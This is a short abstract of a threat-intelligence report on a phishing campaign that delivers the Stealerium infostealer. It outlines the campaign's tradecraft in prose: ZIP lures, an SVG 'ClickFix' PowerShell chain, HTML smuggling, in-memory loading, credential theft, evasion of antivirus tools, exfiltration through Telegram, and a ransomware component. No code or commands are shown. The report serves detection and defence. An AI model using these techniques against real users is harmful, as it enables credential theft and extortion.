Stealerium Unmasked: Inside a Multi-Lure, Multi-Stage Stealer Campaign

This report analyzes an active, operator-driven phishing campaign that consistently deploys the Stealerium .NET infostealer via password-protected ZIP lures and a user-assisted SVG "ClickFix" PowerShell chain; the actors evolved delivery (HTML credential-harvesting, HTML smuggling, and multiple fallback loaders) while keeping a stable execution core that performs reflective in-memory loading, credential and file theft, persistence, AV interference, and exfiltration via Telegram and cloud hosts. The build also contains an operator-triggered ransomware component, and the report includes observed C2 endpoints and IoCs to support detection and mitigation.